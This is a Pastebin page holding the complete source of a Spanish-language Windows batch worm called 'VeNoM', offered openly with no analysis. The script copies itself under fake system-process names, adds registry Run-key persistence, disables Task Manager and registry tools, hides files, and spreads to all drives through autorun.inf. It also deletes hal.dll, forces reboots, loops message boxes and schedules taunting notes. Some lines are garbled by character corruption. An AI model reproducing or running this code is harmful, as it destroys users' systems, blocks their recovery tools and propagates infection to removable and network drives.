API tools faq
paste
Advertisement
Mayk0

#; Virus VeNoM!

Mayk0
Apr 14th, 2013
201
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.51 KB | None | 0 0
raw download clone embed print report
  1. @shift 1
  2. @echo off
  3. echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata%\desktop.log
  4. if %COMPUTERNAME%==DESKTOP goto NOT
  5. if '%COMPUTERNAME%== ' goto NOT
  6. set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  7. set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  8. goto ini
  9. :NOT
  10. set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  11. set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  12. :ini
  13. set a=%random%
  14. taskkill /f /im Ad-Watch.exe
  15. copy /y %0 "%Windir%\System\winlogon.exe"
  16. if exist "%Windir%\System\winlogon.exe" goto cop
  17. copy /y %0 "%appdata%\smss.exe"
  18. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%appdata%\smss.exe" /f
  19.  
  20. :cop
  21. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%Windir%\System\winlogon.exe" /f
  22. if %COMPUTERNAME%==DESKTOP goto NO
  23. if '%COMPUTERNAME%== ' goto NO
  24. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
  25. reg add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f
  26. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
  27. reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "1" /f
  28. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f
  29. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f
  30. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "0" /f
  31. reg add "HKCU\_VenoM_Software_%a%%a%%a%\Virus" /v estas /d "infectado"
  32. copy /y %0 "%userprofile%\Men£ Inicio\Programas\Inicio\MS-DOS.pif"
  33. copy /y %0 "%systemdrive%\Docume~1\Default User\Men£ Inicio\Programas\Inicio\System.exe"
  34. copy /y %0 "%userprofile%\SendTo\Mis documetos.exe"
  35. copy /y %0 "%userprofile%\SendTo\Disco extraible.pif"
  36. copy /y %0 "%userprofile%\SendTo\Documentos compartidos.scr"
  37. cd %userprofile%
  38. date /t>desktop.inf
  39. find "2008" desktop.inf
  40. if errorlevel 0 if not errorlevel 1 goto Dr
  41.  
  42. :NO
  43. attrib +h %windir%
  44. copy /y %0 "%systemdrive%\WINDOWS.EXE"
  45. copy /y %0 "%windir%\system32\%username% 3D.scr"
  46. copy /y %0 "%userprofile%\Men£ Inicio\Mis documentos.exe"
  47. copy /y %0 "%userprofile%\Datosd~1\Microsoft\Internet Explorer\Quick Launch\Mis documentos.exe"
  48. copy /y %0 "%systemdrive%\RECYCLER\Documendos borrados de %username%.exe"
  49. copy /y %0 "%systemdrive%\RECYCLER\Papelera de reciclaje compartida.exe"
  50. cd "%userprofile%"
  51. echo [autorun>>autorun.inf
  52. echo open=VenoM.666\Explorer.exe>>autorun.inf
  53. echo shell\Open=>>autorun.inf
  54. echo shell\Open\Command=.\VenoM.666\Explorer.exe>>autorun.inf
  55. echo shell\Explore\=>>autorun.inf
  56. echo shell\Explore\Command=.\VenoM.666\Explorer.exe>>autorun.inf
  57. echo shell\find\=>>autorun.inf
  58. echo shell\find\Command=.\VenoM.666\Explorer.exe>>autorun.inf
  59. echo shell\CMD=Sïmbolo del sistema>>autorun.inf
  60. echo shell\CMD\Command=.\VenoM.666\Explorer.exe>>autorun.inf
  61. for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf>Nul© /y autorun.inf %%h:\autorun.inf>Nul&attrib +s +h +r +a %%h:\autorun.inf>Nul&md %%h:\VenoM.666>Nul© /y %0 %%h:\VenoM.666\Explorer.exe>Nul&attrib +s +h %%h:\VenoM.666\*.exe>Nul&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf"
  62. if %COMPUTERNAME%==DESKTOP goto l
  63. if '%COMPUTERNAME%== ' goto l
  64. cd "%userprofile%"
  65. echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3 @hotmail.com).">VenoM.txt
  66. echo.>>VenoM.txt
  67. echo ÛÛÛÛÛÛÛ ÛÛÛÛ
  68. echo ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ>>VenoM.txt
  69. echo ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛ Û>>VenoM.txt
  70. echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
  71. echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
  72. echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
  73. echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛ Û ÛÛÛ Û ÛÛÛ ÛÛÛ Û>>VenoM.txt
  74. echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
  75. echo ÛÛÛÛ ÛÛ ÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
  76. echo ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
  77. echo ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛ>>VenoM.txt
  78.  
  79. copy /y VenoM.txt "%userprofile%\SendTo\Game Over %a%%a%.txt"
  80. print VenoM.txt
  81. for /l %%t in (1,1,24) do at %%t /delete
  82. set h=0
  83.  
  84. :q
  85. at %h%:13 /interactive "%userprofile%\VenoM.txt"
  86. set /a h=%h%+1
  87. if %h%==24 goto l
  88. goto q
  89.  
  90. :l
  91. if exist "%appdata%\services.exe" goto bl
  92. copy /y %0 "%appdata%\services.exe"
  93. :bl
  94. if exist "%appdata%\lsass.exe" goto oz
  95. copy /y %0 "%appdata%\lsass.exe"
  96. :oz
  97. if %0=="%appdata%\services.exe" goto ser
  98. if %0=="%appdata%\lsass.exe" goto w
  99.  
  100. "%appdata%\services.exe"
  101. "%appdata%\lsass.exe"
  102. exit
  103.  
  104. :w
  105. cd "%userprofile%"
  106. for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\VenoM.666\Explorer.exe" goto d )
  107. for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\autorun.inf" goto d )
  108. goto w
  109.  
  110. :d
  111. cd "%userprofile%"
  112. for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf© /y autorun.inf %%h:\autorun.inf&attrib +s +h +r +a %%h:\autorun.inf&md %%h:\VenoM.666© /y %0 %%h:\VenoM.666\Explorer.exe&attrib +s +h %%h:\VenoM.666\*.exe&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf"
  113. goto w
  114.  
  115. r
  116. if %COMPUTERNAME%==DESKTOP exit
  117. del /f /q "%windir%\system32\hal.dll"
  118. cd "%userprofile%\Men£ Inicio\Programas\Inicio\"
  119. echo shutdown -r -f -t 00>VenoM.bat
  120. echo OPTION EXPLICIT>VenoM.vbs
  121. echo DIM clave>>VenoM.vbs
  122. echo DO WHILE (clave ^<^> "666">>VenoM.vbs
  123. echo clave = msgbox ("", VBCRITICAL, "">>VenoM.vbs
  124. echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2">>VenoM.vbs
  125. echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM">>VenoM.vbs
  126. echo LOOP>>VenoM.vbs
  127. start VenoM.vbs
  128. shutdown -r -f -t 120 -c "Welcome to Hell"
  129.  
  130. :B
  131. echo
  132. goto B
  133.  
  134. :ser
  135. cd "%appdata%"
  136. set u=%0
  137. dir "%userprofile%\misdoc~1\*." /b /s >"%appdata%\NTUSER.DAT.DLL"
  138. for %%f in (%TU%) do if exist %%f:\*.* (dir "%%f:\*." /b /s) >>"%appdata%\NTUSER.DAT.DLL"
  139. for /f "tokens=* delims= " %%a in (NTUSER.DAT.DLL) do call :V "%%a"
  140. :V
  141. set t=%1
  142. copy /y %u% %t%.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!